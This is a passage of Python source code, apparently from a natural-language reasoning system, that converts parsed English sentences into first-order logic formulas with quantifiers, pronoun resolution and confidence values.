object_data=make_object_data(ctxt,sentence,objpart)\n #debug_print(\"object_data\",object_data)\n object=get_thing(objpart)\n objspecialvar=None\n objconst=None \n object_det=get_word_det(ctxt,sentence,object)\n object_quant=get_word_quant(ctxt,sentence,object)\n\n #debug_print(\"object_quant\",object_quant) \n subject=get_thing(subjpart)\n subjspecialvar=None\n subjconst=None\n subjispronoun=False\n subjisparent=False\n subject_det=get_word_det(ctxt,sentence,subject)\n sargument=None\n\n if pronoun(ctxt,subject):\n #debug_print(\"subject is pronoun:\",subject)\n if not subject[\"lemma\"] in [\"who\",\"that\",\"whom\",\"which\"]:\n tmp=resolve_pronoun(ctxt,sentence,subject,tree,verb,object)\n else:\n tmp=None \n #debug_print(\"subject resolved to tmp:\",tmp)\n if not tmp:\n if parent_object_pair:\n subjrepr=parent_object_pair[0]\n #subjispronoun=True # ??\n subjisparent=True\n else: \n # She was in a room. 
She was in a room?\n # If she was cool, then she was nice.\n subjconst=find_make_constant(ctxt,sentence,subject) \n subjrepr=subjconst\n subjispronoun=True\n else: \n subject=tmp[1]\n subjrepr=tmp[0]\n subjispronoun=True\n elif subject and subject[\"lemma\"]==unknownsubject:\n svar=\"?:\"+subject[\"lemma\"]\n subjspecialvar=svar \n subjrepr=subjspecialvar\n subject_quantifier=\"exists\" \n elif subject and variable_shaped_lemma(subject[\"lemma\"]):\n svar=\"?:\"+subject[\"text\"]\n subjspecialvar=svar \n subjrepr=subjspecialvar \n elif (subject and subject[\"upos\"] in [\"PROPN\"] and \n (\"ner\" not in subject or subject[\"ner\"] not in [\"NORP\",\"S-NORP\"])):\n #debug_print(\"subj is propn\",subject)\n subjconst=find_make_constant(ctxt,sentence,subject) \n subjrepr=subjconst\n elif is_concrete_thing(ctxt,sentence,subject,subject_det,verb,iscondition,isconsequence,isobject=False):\n if False:\n None\n else: \n #ctxt[\"nosaveconstant\"]=True\n if parent_object_pair:\n tmp_logic=make_obj_logic(ctxt,sentence,dummysubject,parent_object_pair[0],verbpart,subjpart,True) \n else:\n tmp_logic=make_obj_logic(ctxt,sentence,dummysubject,dummysubject,verbpart,subjpart,True) \n if tmp_logic and type(tmp_logic)==list and tmp_logic[0]==\"not\":\n tmp_logic=tmp_logic[1] \n #debug_print(\"tmp_logic1\",tmp_logic) \n tmp_logic=prop_flatten_logic_term(tmp_logic)\n subjconst=make_determined_constant(ctxt,sentence,subject,subject_det,tmp_logic,verb) \n subjrepr=subjconst \n tmp_logic=logic_replace_el(tmp_logic,dummysubject,subjconst)\n #debug_print(\"tmp_logic 3\",tmp_logic) \n if subjconst:\n #debug_print(\"ctxt\",ctxt)\n #debug_print(\"ctxt[objects]\",ctxt[\"objects\"])\n for el in ctxt[\"objects\"]:\n if el[0]==subjconst:\n tmp=logic_replace_el(el[2],\"?:X10\",subjconst)\n el[2]=tmp\n #debug_print(\"tmp_logic 4\",tmp_logic) \n if (\"argument\" in subject) and type(subjrepr)==list and is_theof_or_measure_function(subjrepr[0]): \n if tmp_logic:\n arg_logic=tmp_logic\n subj_logic=tmp_logic\n\n sargument=subject[\"argument\"]\n #debug_print(\"subjrepr\",subjrepr) \n #debug_print(\"sargument\",sargument)\n \n elif \"argument\" in subject: \n svar=None\n sargument=subject[\"argument\"]\n #debug_print(\"sargument 0\",sargument)\n svar=\"?:S\"+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n\n #subjconst1=make_determined_constant(ctxt,sentence,subject,subject_det,None)\n #debug_print(\"subjconst1\",subjconst1) \n #subject_det=get_word_det(ctxt,sentence,subject)\n #debug_print(\"argument\",sargument)\n #debug_print(\"subject_det\",subject_det) \n # assume a concrete argument and a concrete function\n #if (subject_det and subject_det[\"lemma\"] in [\"the\"]):\n #debug_print(\"concrete argument-having object\")\n #argconst=make_constant(ctxt,argument)\n #sargconst=find_make_constant(ctxt,sentence,sargument,False,True,None)\n #sterm=[theof_function+\"1\",subject[\"lemma\"],sargconst] \n #debug_print(\"created sterm\",sterm) \n #return term \n\n tmp_logic=make_simple_obj_logic(ctxt,sentence,svar,subjpart,verbpart,subjpart,None) \n if tmp_logic and type(tmp_logic)==list and tmp_logic[0]==\"not\":\n tmp_logic=tmp_logic[1] \n #debug_print(\"tmp_logic1\",tmp_logic) \n tmp_logic=prop_flatten_logic_term(tmp_logic) \n subjrepr=svar \n subj_logic=tmp_logic\n #debug_print(\"subj_logic alternative\",subj_logic)\n if subjrepr:\n #debug_print(\"ctxt\",ctxt)\n #debug_print(\"ctxt[objects]\",ctxt[\"objects\"])\n if not ctxt[\"isquestion\"] and not (\"nosaveconstant\" in ctxt and ctxt[\"nosaveconstant\"]): \n for el in 
ctxt[\"objects\"]:\n if el[0]==subjrepr:\n tmp=logic_replace_el(el[2],\"?:X10\",subjrepr)\n el[2]=tmp \n else:\n #debug_print(\"cpy default case subject\",subject)\n svar=\"?:S\"+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n subjrepr=svar \n subject_quant=get_word_quant(ctxt,sentence,subject) \n #debug_print(\"subject_quant\",subject_quant) \n #debug_print(\"cp subjrepr\",subjrepr) \n\n # maybe the same subject already exists?\n if (subject and (\"passed_words\" in ctxt) and\n subject[\"upos\"] in [\"NOUN\"]): \n #debug_print(\"cpz subject\",subject) \n #debug_print(\"cpz ctxt[passed_words]\",ctxt[\"passed_words\"])\n for el in ctxt[\"passed_words\"]:\n if el[1]==subject:\n subjrepr=el[0]\n break\n \n if is_var(subjrepr):\n if (subject_quant and subject_quant[\"lemma\"] in [\"every\",\"all\",\"no\"]):\n if not word_has_child_in_deprel_upos(ctxt,sentence,subject,[\"advmod\"],[\"ADV\"]):\n if object and word_has_child_in_deprel_upos(ctxt,sentence,object,[\"advmod\"],[\"ADV\"]):\n None\n else: \n subjrepr=subjrepr+\"_every\"\n \n #debug_print(\" ----------- subj_logic 00 ----------\",subj_logic)\n #debug_print(\"sargument\",sargument)\n #debug_print(\"svar\",svar)\n if subjispronoun or subjisparent:\n subj_logic=True\n elif sargument: # and svar:\n None\n else: \n subj_logic=make_obj_logic(ctxt,sentence,subjrepr,subjrepr,verbpart,subjpart,True)\n if subj_logic and type(subj_logic)==list and subj_logic[0]==\"not\":\n subj_logic=subj_logic[1] \n\n #debug_print(\"subj_logic 0\",subj_logic)\n subj_logic=prop_flatten_logic_term(subj_logic)\n subjvars=collect_free_vars(subj_logic) \n \n if ctxt[\"isquestion\"] and subject_det and subject_det[\"lemma\"] in [\"a\"]:\n # Change of \"a\" into \"some\" for question if the kind of object is present in ctxt\n # \"The red square has a nail. The blue square has a hole. 
A square has a nail?\"\n oldobject=find_existing_object(ctxt,sentence,subject,subj_logic)\n #debug_print(\"subj_logic\",subj_logic)\n #debug_print(\"oldobject\",oldobject)\n if oldobject:\n subject_quantifier=\"exists\"\n\n #debug_print(\"subj_logic 1\",subj_logic)\n #debug_print(\"subj_logic svar\",svar)\n #debug_print(\"subj_logic subjrepr\",subjrepr)\n #debug_print(\"verb\",verb)\n #debug_print(\"subj_logic subjvars\",subjvars)\n #debug_print(\"subj_logic subjconst\",subjconst)\n \n update_ctxt_objects(ctxt,subjconst,subject,subj_logic)\n #debug_print(\"ctxt x ctxt[objects]\",ctxt[\"objects\"]) \n #debug_print(\"subjrepr\",subjrepr)\n\n # - - - - - verb is be - - - - - -\n\n if type(verb)==dict and verb[\"lemma\"] in [\"be\"] and not \"relation\" in verb and sentence_type!=\"is_of\":\n #debug_print(\"be-sentence\")\n var=subjrepr #\"?:X\"\n objrepr=subjrepr\n if subjspecialvar: var=subjspecialvar \n if (subject_quant and subject_quant[\"lemma\"] in [\"no\",\"zero\"] and\n (not(object_quant) or not(object_quant[\"lemma\"] in [\"no\",\"zero\"]))): reversepolarity=True\n else: reversepolarity=False\n subj_quant_confidence=get_word_quantor_confidence(ctxt,sentence,subject)\n subj_confidence=top_confidence*subj_quant_confidence \n if subj_confidence==0: return None\n elif subj_confidence<0: reversepolarity=not reversepolarity\n if subj_confidence==0:\n return None \n #debug_print(\"checkpoint a subjrepr\",subjrepr) \n #debug_print(\"checkpoint a subj_logic\",subj_logic)\n #debug_print(\"checkpoint a subj_confidence\",subj_confidence)\n \n obj_logic=make_obj_data_logic(ctxt,sentence,var,subjpart,verbpart,objpart,object_data,False,False,reversepolarity,[abs(subj_confidence),True],subjrepr)\n #debug_print(\"checkpoint b obj_logic\",obj_logic)\n framevars=collect_frame_vars(obj_logic)\n #debug_print(\"checkpoint b framevars\",framevars)\n if framevars:\n obj_logic=merge_known_framevars(obj_logic,framevars)\n framevars=[framevars[0]]\n if type(obj_logic)==list and obj_logic[0]==\"not\": \n obj_logic=[\"not\",[\"exists\",framevars,obj_logic[1]]] \n else:\n obj_logic=[\"exists\",framevars,obj_logic] \n #debug_print(\"checkpoint c obj_logic\",obj_logic)\n #debug_print(\"subject 0\",subject)\n #debug_print(\"subject_det 0\",subject_det)\n #debug_print(\"subject_quant 0\",subject_quant)\n #debug_print(\"subject_quantifier subjrepr\",[subject_quantifier,subjrepr])\n \n if not(subjispronoun) and subject_quant and subject_quant[\"lemma\"] in [\"some\",\"exist\"]:\n quantifier=\"exists\"\n logic=[\"logic\",tree,[quantifier,[var],[\"and\",subj_logic,obj_logic]]]\n elif not(subjispronoun) and subject_quant and subject_quant[\"lemma\"] in [\"all\",\"every\"]:\n quantifier=\"forall\"\n if subject_quant[\"lemma\"] in [\"all\"] and type(obj_logic)==list and obj_logic[0]==\"not\":\n logic=[\"logic\",tree,[\"exists\",[var],[subj_logic,\"&\",obj_logic]]]\n else:\n logic=[\"logic\",tree,[quantifier,[var],[subj_logic,\"=>\",obj_logic]]] \n elif (ctxt[\"isquestion\"] and not(subjispronoun) and (not sargument) and\n subject[\"upos\"]==\"NOUN\" and\n not subject_quant and subject_det and \n subject_det[\"lemma\"] in[\"a\"]):\n quantifier=\"exists\" \n \n #logic=[\"logic\",tree,[quantifier,[var],[subj_logic,\"=>\",obj_logic]]] \n logic=[\"logic\",tree,[quantifier,[var],[subj_logic,\"&\",obj_logic]]]\n\n elif iscondition and is_var(subjrepr):\n # hard case: if a bear is nice, it has a tail\n # but: if bears are nice, cars are red\n # both cases can be wrong \n #debug_print(\"subject\",subject)\n 
#debug_print(\"subject_det\",subject_det)\n #debug_print(\"subject_quant\",subject_quant)\n if (subject and not(subjispronoun) and word_has_feat(subject,\"Number\",\"Plur\") and\n ((not subject_quant and not subject_det) or\n (subject_quant and subject_quant[\"lemma\"] in [\"all\",\"every\",\"each\"]))): \n quantifier=\"forall\"\n logic=[\"logic\",tree,[quantifier,[var],[subj_logic,\"=>\",obj_logic]]] \n #debug_print(\"logic x\",logic)\n else:\n logic=[\"logic\",tree,[\"and\",subj_logic,obj_logic]] \n elif subjispronoun:\n #debug_print(\"checkpoint subjispronoun\",subjispronoun)\n logic=[\"logic\",tree,obj_logic]\n #logic=[\"logic\",tree,[\"and\",subj_logic,obj_logic]]\n elif subjspecialvar:\n logic=[\"logic\",tree,[subj_logic,\"=>\",obj_logic]]\n elif not(subjispronoun) and subject_quant and subject_quant[\"lemma\"] in [\"some\",\"exist\"]:\n quantifier=\"exists\"\n logic=[\"logic\",tree,[quantifier,[var],[\"and\",subj_logic,obj_logic]]]\n elif subjconst:\n #debug_print(\"checkpoint subj_logic\",subj_logic)\n obj_logic=make_obj_logic(ctxt,sentence,subjconst,subjpart,verbpart,objpart,False,False,reversepolarity,abs(subj_confidence)) \n #debug_print(\"checkpoint c obj_logic\",obj_logic)\n framevars=collect_frame_vars(obj_logic)\n #debug_print(\"checkpoint d framevars\",framevars)\n if framevars:\n obj_logic=merge_known_framevars(obj_logic,framevars)\n framevars=[framevars[0]]\n if type(obj_logic)==list and obj_logic[0]==\"not\": \n obj_logic=[\"not\",[\"exists\",framevars,obj_logic[1]]] \n else:\n obj_logic=[\"exists\",framevars,obj_logic] \n #debug_print(\"checkpoint d obj_logic\",obj_logic) \n logic=[\"and\",subj_logic,obj_logic]\n for fvar in subjvars:\n if fvar!=subjrepr and (not is_keep_free_var(ctxt,fvar)): # and (not svar or fvar!=svar):\n logic=[\"exists\",[fvar],logic] \n logic=[\"logic\",tree,logic]\n #debug_print(\"logic end 1\",logic[2]) \n elif sargument: \n #debug_print(\"subject\",subject)\n #debug_print(\"sargument\",sargument)\n #debug_print(\"svar\",svar)\n #debug_print(\"subjvars\",subjvars)\n #debug_print(\"subj_confidence\",subj_confidence)\n if svar:\n #debug_print(\"svar\",svar)\n if ctxt[\"isquestion\"] or (sargument and type(sargument)==dict and (subjispronoun or sargument[\"upos\"]==\"PROPN\")):\n quantifier=\"exists\" \n logic=[\"logic\",tree,[quantifier,[svar],[\"and\",subj_logic,obj_logic]]] \n else:\n quantifier=\"forall\" \n logic=[\"logic\",tree,[quantifier,[svar],[subj_logic,\"=>\",obj_logic]]] \n else:\n obj_logic=make_obj_logic(ctxt,sentence,subjrepr,subjpart,verbpart,objpart,False,False,reversepolarity,[abs(subj_confidence),True]) \n #debug_print(\"checkpoint d obj_logic\",obj_logic)\n framevars=collect_frame_vars(obj_logic)\n #debug_print(\"checkpoint e framevars\",framevars)\n if framevars:\n obj_logic=merge_known_framevars(obj_logic,framevars)\n framevars=[framevars[0]]\n if type(obj_logic)==list and obj_logic[0]==\"not\": \n obj_logic=[\"not\",[\"exists\",framevars,obj_logic[1]]] \n else:\n obj_logic=[\"exists\",framevars,obj_logic] \n \n logic=[\"logic\",tree,[\"and\",subj_logic,obj_logic]] \n #debug_print(\"logic end 2\",logic[2]) \n else:\n quantifier=\"forall\" \n logic=[\"logic\",tree,[quantifier,[var],[subj_logic,\"=>\",obj_logic]]]\n \n #debug_print(\"obj_logic y\",obj_logic)\n #debug_print(\"logic y\",logic)\n #debug_print(\"ctxt[objects] a\",ctxt[\"objects\"])\n\n if subjrepr!=dummysubject:\n ctxt[\"passed_words\"].append([subjrepr,subject,\"subject\"])\n if objrepr!=dummysubject: \n 
ctxt[\"passed_words\"].append([objrepr,object,\"object\"])\n if ((not ctxt[\"isquestion\"]) and (not iscondition) and (not isconsequence) and\n subjrepr and not is_var(subjrepr)):\n update_ctxt_objects(ctxt,subjrepr,subject,logic)\n\n logic=prop_flatten_logic_term(logic)\n logic=simplify_quantors(logic)\n if iscondition: \n logic=remove_confidence_annotations(ctxt,logic) \n \n return logic \n\n # - - - - - general case - - - - -\n \n elif type(verb)==dict: \n \n #debug_print(\"general case\")\n #debug_print(\"sentence_type\",sentence_type)\n if sentence_type==\"is_of\": \n # Elephants are afraid of mice\n object_data=make_object_data(ctxt,sentence,relatedobject[\"obj\"])\n #debug_print(\"object_data\",object_data)\n elif verb[\"lemma\"] in [\"have\"]: sentence_type=\"has\"\n elif \"relation\" in verb and verb[\"relation\"]: sentence_type=\"verb_relation\"\n else: sentence_type=None\n #debug_print(\"sentence_type\",sentence_type)\n \n if sentence_type==\"is_of\":\n verb_is_positive=get_word_polarity(ctxt,sentence,relation_word) \n elif sentence_type==\"verb_relation\":\n verb_is_positive=get_word_polarity(ctxt,sentence,verb)\n else: \n verb_is_positive=get_word_polarity(ctxt,sentence,verb)\n \n verb_confidence=get_word_confidence(ctxt,sentence,verb) \n orig_verb_confidence=verb_confidence \n if verb_confidence==0: return None \n elif verb_confidence<0: \n verb_confidence=0-verb_confidence\n verb_is_positive=not verb_is_positive \n #debug_print(\"verb_confidence abs\",verb_confidence) \n #debug_print(\"verb_is_positive\",verb_is_positive)\n\n #debug_print(\"subject\",subject)\n subj_quant_confidence=get_word_quantor_confidence(ctxt,sentence,subject)\n subj_confidence=top_confidence*subj_quant_confidence \n if subj_confidence==0: return None \n elif subj_confidence<0: verb_is_positive=not verb_is_positive \n obj_quant_confidence=1\n\n if verb_in_past(ctxt,sentence,verb): # word_has_feat(verb,\"Tense\",\"Past\"):\n verb_is_past=True\n else: \n verb_is_past=False \n \n #debug_print(\"subject_quant\",subject_quant)\n #debug_print(\"subject_quantifier\",subject_quantifier)\n if subject_quantifier:\n None\n elif subject_quant and subject_quant[\"lemma\"] in [\"some\",\"exists\"]:\n subject_quantifier=\"exists\"\n elif subject_quant and subject_quant[\"lemma\"] in [\"no\",\"zero\"]:\n subject_quantifier=\"forall\" \n verb_is_positive=not verb_is_positive \n elif ctxt[\"isquestion\"] and verb_is_past and not (\"?:\" in subjrepr and \"_every\" in subjrepr):\n subject_quantifier=\"exists\"\n elif iscondition:\n # \"If a person needs John, they are nice.\" \n if (subject and not(subjispronoun) and word_has_feat(subject,\"Number\",\"Plur\") and\n ((not subject_quant and not subject_det) or\n (subject_quant and subject_quant[\"lemma\"] in [\"all\",\"every\",\"each\"]))): \n subject_quantifier=\"forall\"\n else:\n subject_quantifier=\"exists\" \n elif (verb[\"lemma\"]==\"be\" and\n word_has_child_in_deprel_lemma(ctxt,sentence,verb,\"expl\",[\"there\"])):\n # \"There is a ghost in the room?\"\n subject_quantifier=\"exists\" \n elif (verb[\"lemma\"]==\"be\" and (\"relation\" in verb) and\n (verb[\"relation\"] in is_location_relations)): \n # \"A ghost is in the room?\"\n subject_quantifier=\"exists\" \n elif sargument and not svar:\n subject_quantifier=None \n else:\n subject_quantifier=\"forall\" \n\n #debug_print(\"subject\",subject) \n #debug_print(\"subj_logic\",subj_logic) \n #debug_print(\"verb_is_positive\",verb_is_positive) \n #debug_print(\"object\",object)\n obj_logic=None\n if object:\n if 
not(type(object_data)==list and object_data[0] in [\"and\",\"or\",\"nor\",\"xor\"]):\n object_data=[\"single\",object_data]\n if object_quant and object_quant[\"lemma\"] in [\"some\"]:\n object_quantifier=\"exists\"\n elif object_quant and object_quant[\"lemma\"] in [\"all\",\"every\",\"each\",\"most\"]:\n object_quantifier=\"forall\" \n if object_quant[\"lemma\"] in [\"most\"]: obj_quant_confidence=0.9 \n elif (verb[\"lemma\"] in like_type_verbs and\n (verb[\"lemma\"] not in have_type_verbs) and \n word_has_feat(verb,\"VerbForm\",\"Fin\") and\n word_has_feat(subject,\"Number\",\"Plur\") and\n word_has_feat(object,\"Number\",\"Plur\") and\n not is_concrete_thing(ctxt,sentence,object,object_det,verb,iscondition,isconsequence,\n isobject=True)):\n #People like dogs\n #debug_print(\"cp1\")\n object_quantifier=\"forall\" \n if obj_quant_confidence==1: obj_quant_confidence=0.95\n elif sentence_type==\"is_of\":\n #debug_print(\"cp2 is_of\")\n object_quantifier=\"forall\"\n if not is_concrete_thing(ctxt,sentence,object,object_det,verb,iscondition,isconsequence,isobject=True):\n #debug_print(\"cp3 is_of\")\n if obj_quant_confidence==1: obj_quant_confidence=0.95 \n else:\n # Animals have legs\n # Nails are made of iron.\n object_quantifier=\"exists\" \n \n else:\n object_data=[\"single\",\"$dummy_act_object\"] \n object_quantifier=None\n obj_logic=None\n objrepr=None\n \n #debug_print(\"object_quantifier\",object_quantifier)\n #debug_print(\"object_data2\",object_data) \n \n if subjrepr!=dummysubject:\n ctxt[\"passed_words\"].append([subjrepr,subject,\"subject\"])\n\n if type(object_data)==list and object_data[0] in [\"single\",\"and\",\"or\",\"nor\",\"xor\"]: \n #debug_print(\"cp4\")\n mainop=object_data[0]\n all_objects_logic=[mainop] \n \n #debug_print(\"object_data\",object_data) \n #debug_print(\"all_objects_logic 1\",all_objects_logic)\n \n for thisobject in object_data[1:]:\n #debug_print(\"thisobject\",thisobject)\n if thisobject==\"$dummy_act_object\":\n None\n else: \n objpart=thisobject[\"objpart\"]\n #debug_print(\"thisobject\",thisobject)\n #debug_print(\"parent_object_pair\",parent_object_pair)\n #debug_print(\"iscondition\",iscondition)\n #debug_print(\"isconsequence\",isconsequence)\n #debug_print(\"subjpart\",subjpart)\n #debug_print(\"verbpart\",verbpart)\n #debug_print(\"objpart\",objpart) \n #debug_print(\"verb_is_positive\",verb_is_positive)\n #debug_print(\"all_objects_logic\",all_objects_logic)\n #debug_print(\"objpart\",objpart)\n object=get_thing(objpart)\n #debug_print(\"object\",object) \n objspecialvar=None\n objconst=None \n object_det=get_word_det(ctxt,sentence,object)\n #objispronoun=False \n # prerefence of concreteness for objects in case of negation, like needed in:\n # [\"John does not eat a carrot. John eats a carrot?\",False],\n # [\"John is not in a cave. 
John is in a cave?\",False]\n tmp_obj_logic=None\n if ctxt[\"isquestion\"]: prefer_non_concrete=True\n elif not verb_is_positive: prefer_non_concrete=True\n else:\n tmp_obj_logic=make_obj_logic(ctxt,sentence,dummysubject,subjpart,verbpart,objpart)\n if tmp_obj_logic and type(tmp_obj_logic)==list and tmp_obj_logic[0] in [\"not\"]:\n prefer_non_concrete=True\n else:\n prefer_non_concrete=False\n #debug_print(\"tmp_obj_logic\",tmp_obj_logic)\n\n if parent_object_pair and object==parent_object_pair[1]:\n #John had a car which Eve bought\n #Bears who eat fish are strong\n objrepr=parent_object_pair[0] \n elif pronoun(ctxt,object):\n tmp=resolve_pronoun(ctxt,sentence,object,tree,verb,subject)\n #debug_print(\"ctxt[objects] after resolve_pronoun of general handling\",ctxt[\"objects\"])\n if not tmp:\n print(\"error: cannot resolve pronoun, case 4\",object)\n sys.exit(0)\n return None\n object=tmp[1]\n objrepr=tmp[0]\n elif object and type(object)==dict and variable_shaped_lemma(object[\"lemma\"]):\n ovar=\"?:\"+object[\"text\"]\n objspecialvar=ovar \n objrepr=objspecialvar\n elif object and type(object)==dict and object[\"upos\"] in [\"PROPN\"]:\n objconst=find_make_constant(ctxt,sentence,object)\n objrepr=objconst\n elif is_concrete_thing(ctxt,sentence,object,object_det,verb,iscondition,isconsequence,\n isobject=True,prefer_non_concrete=prefer_non_concrete):\n #debug_print(\"in main object is concrete\", object) \n if tmp_obj_logic: \n tmp_logic=tmp_obj_logic\n else: \n tmp_logic=make_obj_logic(ctxt,sentence,dummysubject,subjpart,verbpart,objpart) \n #debug_print(\"tmp_logic 2\",tmp_logic) \n tmp_logic=prop_flatten_logic_term(tmp_logic) \n objconst=make_determined_constant(ctxt,sentence,object,object_det,tmp_logic,verb) \n objrepr=objconst \n tmp_logic=logic_replace_el(tmp_logic,dummysubject,objrepr)\n obj_logic=tmp_logic\n #debug_print(\"obj_logic 2\",obj_logic)\n object_quantifier=None \n elif object_data and object_data[0]==\"single\" and object_data[1] and \"objrepr\" in object_data[1]:\n objrepr=object_data[1][\"objrepr\"] \n else:\n ovar=\"?:O\"+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n objrepr=ovar \n if parent_object_pair and objrepr==parent_object_pair[0]:\n object_quantifier=None \n\n objvars=collect_free_vars(obj_logic) \n if objrepr and type(objrepr)==list and is_theof_or_measure_function(objrepr[0]):\n argvar=objrepr[2]\n else:\n argvar=None \n \n #debug_print(\"objvars\",objvars)\n #debug_print(\"subjrepr\",subjrepr)\n #debug_print(\"objrepr\",objrepr) \n #debug_print(\"argvar\",argvar)\n #debug_print(\"obj_logic 1\",obj_logic)\n\n for fvar in objvars:\n if fvar!=objrepr and fvar!=subjrepr and fvar!=argvar and (not is_keep_free_var(ctxt,fvar)): # and (not svar or fvar!=svar):\n obj_logic=[\"exists\",[fvar],obj_logic] \n actionrepr=\"?:A\"+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n #debug_print(\"obj_logic 1a\",obj_logic)\n \n if not objrepr:\n object_is_positive=True\n else:\n #debug_print(\"main objrepr before\",objrepr)\n #debug_print(\"main obj_logic before\",obj_logic)\n if type(objrepr)!=list:\n obj_logic=make_simple_obj_logic(ctxt,sentence,objrepr,subjpart,verbpart,objpart,actionrepr,orig_verb_confidence==1)\n #debug_print(\"obj_logic 1x\",obj_logic)\n #obj_logic=make_simple_obj_logic(ctxt,sentence,objrepr,subjpart,verbpart,objpart,actionrepr) \n objvars=collect_free_vars(obj_logic) \n\n #debug_print(\"obj_logic 3\",obj_logic)\n #debug_print(\"objvars2\",objvars)\n #debug_print(\"objrepr\",objrepr) \n #debug_print(\"argvar\",argvar)\n\n for fvar in objvars:\n if 
fvar!=objrepr and fvar!=subjrepr and fvar!=argvar and (not is_keep_free_var(ctxt,fvar)): # and (not svar or fvar!=svar):\n obj_logic=[\"exists\",[fvar],obj_logic] \n #debug_print(\"obj_logic 4\",obj_logic) \n #debug_print(\"main obj_logic of general handling\",obj_logic) \n #debug_print(\"main ctxt[objects] after make_simple_obj_logic of general handling\",ctxt[\"objects\"])\n if obj_logic and type(obj_logic)==list and obj_logic[0]==\"not\":\n object_is_positive=False\n obj_logic=obj_logic[1]\n else:\n object_is_positive=True \n\n if ((not ctxt[\"isquestion\"]) and (not iscondition) and (not isconsequence) and\n objrepr):\n #debug_print(\"about to update_ctxt_objects in main, objects are\") \n #show_objects(ctxt)\n update_ctxt_objects(ctxt,objrepr,object,obj_logic)\n #debug_print(\"after update_ctxt_objects in main, objects are\") \n #show_objects(ctxt) \n\n #debug_print(\"obj_logic\",obj_logic)\n #debug_print(\"objrepr\",objrepr)\n obj_logic_function=make_logic_counted_function(ctxt,sentence,obj_logic,objrepr,\n object,verb,subject,isobject=True,noplural=(iscondition or not verb_is_positive))\n #debug_print(\"obj_logic_function\",obj_logic_function)\n #debug_print(\"subjrepr\",subjrepr)\n #debug_print(\"objrepr\",objrepr)\n if (obj_logic_function and obj_logic_function[0] and \n not (type(subjrepr)==list and type(subjrepr[0])==str and subjrepr[0].startswith(measure_function))):\n substituted_function=apply_simple_defs(ctxt,obj_logic_function[1])\n sorted_substituted_function=sort_logic(ctxt,substituted_function)\n #objsetrepr=[set_function,obj_logic_function[1],subjrepr]\n objsetrepr=[set_function,sorted_substituted_function,subjrepr]\n countatom=logic_replace_el(obj_logic_function[0],objrepr,objsetrepr)\n debug_print(\"objsetrepr 1\",objsetrepr)\n #debug_print(\"substituted_function\",substituted_function)\n #debug_print(\"sorted_substituted_function\",sorted_substituted_function)\n #debug_print(\"countatom\",countatom)\n else:\n objsetrepr=None \n\n #debug_print(\"verb2\",verb)\n confidence=get_word_confidence(ctxt,sentence,verb) \n #debug_print(\"verb confidence2\",confidence)\n if (not confidence or confidence==1): # and verb[\"lemma\"] in [\"be\"]:\n confidence=get_word_confidence(ctxt,sentence,get_parent(sentence,verb)) \n if confidence==0: return None\n elif confidence<0: confidence=abs(confidence)\n if abs(subj_confidence)==1:\n confidence=confidence*obj_quant_confidence\n else:\n confidence=abs(subj_confidence)*obj_quant_confidence\n\n #debug_print(\"relation\",relation) \n #debug_print(\"subj_confidence\",subj_confidence)\n #debug_print(\"obj_quant_confidence\",obj_quant_confidence)\n #debug_print(\"confidence 3\",confidence)\n \n act_maintype=determine_act_main_type(ctxt,sentence,subject,verb,object)\n if objrepr:\n act_type=act_maintype+\"2\"\n else:\n act_type=act_maintype+\"1\" \n\n action_prop_logic=make_action_prop_logic(ctxt,sentence,verb,actionrepr,subject,subjrepr,tree,verb_is_positive,subjconst) \n #debug_print(\"created action_prop_logic\",action_prop_logic)\n #debug_print(\"objsetrepr\",objsetrepr)\n if objsetrepr:\n setrelation=make_atom_2(ctxt,sentence,verb,verb,True,subjrepr,objsetrepr,confidence,act_type,actionrepr)\n else:\n setrelation=None\n\n if sentence_type==\"is_of\":\n # Elephants are afraid of mice\n thingparam=relation_word\n else:\n thingparam=verb\n if objrepr: \n if subjrepr and is_var(subjrepr):\n relation=make_atom_2(ctxt,sentence,verb,thingparam,True,subjrepr,objrepr,confidence,act_type,actionrepr,blocker_preferred=True)\n else:\n 
relation=make_atom_2(ctxt,sentence,verb,thingparam,True,subjrepr,objrepr,confidence,act_type,actionrepr) \n else:\n relation=make_qualified_atom_1(ctxt,sentence,verb,thingparam,True,subjrepr,confidence,act_type,actionrepr,blocker_preferred=True) \n #debug_print(\"relation after\",relation)\n #debug_print(\"action_prop_logic\",action_prop_logic)\n\n if action_prop_logic:\n relation=[\"exists\",[actionrepr],[\"and\",action_prop_logic,relation]]\n else: \n relation=[\"exists\",[actionrepr],relation]\n\n #debug_print(\"relation\",relation) \n #debug_print(\"verb_is_positive\",verb_is_positive)\n #debug_print(\"object_is_positive\",object_is_positive)\n #debug_print(\"objrepr\",objrepr) \n if not verb_is_positive:\n object_is_positive=not object_is_positive\n\n #debug_print(\"relation\",relation) \n framevars=collect_frame_vars(relation)\n relation=merge_known_framevars(relation,framevars)\n if framevars: framevars=[framevars[0]]\n if framevars and not (\"isquestion\" in ctxt and ctxt[\"isquestion\"]):\n relation=[\"exists\",framevars,relation]\n framevars=collect_frame_vars(setrelation)\n setrelation=merge_known_framevars(setrelation,framevars)\n if framevars: framevars=[framevars[0]]\n if framevars and not (\"isquestion\" in ctxt and ctxt[\"isquestion\"]):\n setrelation=[\"exists\",framevars,setrelation] \n \n #debug_print(\"obj_logic\",obj_logic)\n #debug_print(\"object_quantifier\",object_quantifier)\n #debug_print(\"setrelation\",setrelation)\n #if countatom: debug_print(\"countatom\",countatom)\n\n if obj_logic==None: \n if setrelation:\n full_object_logic=[\"and\",relation,setrelation]\n else:\n full_object_logic=relation \n else: \n if objsetrepr and countatom:\n obj_logic=[\"and\",countatom,obj_logic]\n\n if object_quantifier==\"exists\":\n full_object_logic=[obj_logic,\"&\",relation]\n elif object_quantifier==None:\n full_object_logic=[obj_logic,\"&\",relation] \n else: \n full_object_logic=[obj_logic,\"=>\",relation]\n\n if not objspecialvar:\n if object_quantifier: \n full_object_logic=[object_quantifier,[objrepr],full_object_logic] \n if objrepr and type(objrepr)==list and is_theof_or_measure_function(objrepr[0]):\n quantvar=objrepr[2] \n full_object_logic=[\"exists\",[quantvar],full_object_logic]\n\n if objrepr!=dummysubject: \n ctxt[\"passed_words\"].append([objrepr,object,\"object\"])\n \n if subject_quantifier==\"exists\" and subjrepr and unknownsubject in subjrepr:\n # Colin is wounded\n #debug_print(\"subject_quantifier1 subjrepr\",[subject_quantifier,subjrepr]) \n full_object_logic=[\"exists\",[subjrepr],full_object_logic]\n if not 